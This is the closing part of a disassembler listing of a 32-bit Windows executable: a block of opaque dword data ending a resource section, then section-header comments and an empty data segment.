		dd 3912515h, 1EB95998h,	5DAF3B1Fh, 83A1BDBCh, 7F9B0010h
		dd 1121BE7h, 0B44416D5h, 63EC6248h, 0F5DFDCA6h,	8ABD2109h
		dd 8624B3EAh, 1F48ECD6h, 8C283F1h, 2E63070Ah, 0C6F094B8h
		dd 817EF3BCh, 0CC00628h, 9166E77Ah, 0A6315535h,	3B45858h
		dd 0CCFA9123h, 0A48400BCh, 45A3CFD1h, 0C0707A22h, 0C78AE2DFh
		dd 2693017Dh, 126D36CAh, 59E056F9h, 0D7C751FFh,	73C5110Eh
		dd 5DB99C50h, 8994385Bh, 8E9D790Ch, 469804E8h, 51EBA0A0h
		dd 0C08A2E2Dh, 139CFC86h, 37B1B6B7h, 0F8CD0692h, 6B50749Ch
		dd 0FD710F0Fh, 50163A81h, 0C070F4F4h, 0F40B6767h, 0FDF0D9FEh
		dd 353D4069h, 0F262463Ch, 3D512Bh, 0F847A3A4h, 0B88A3243h
		dd 0B5AC9302h, 0CBAFD04Bh, 0C1FC6987h, 0B546811Dh, 150Dh dup(0)
_rsrc		ends

; Section 4. (virtual address 0000F000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00000200 (	512.)
; Offset to raw	data for section: 0000E400
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
_idata2		segment	para public 'DATA' use32
		assume cs:_idata2
		;org 100F000h
		align 2000h
_idata2		ends


		end start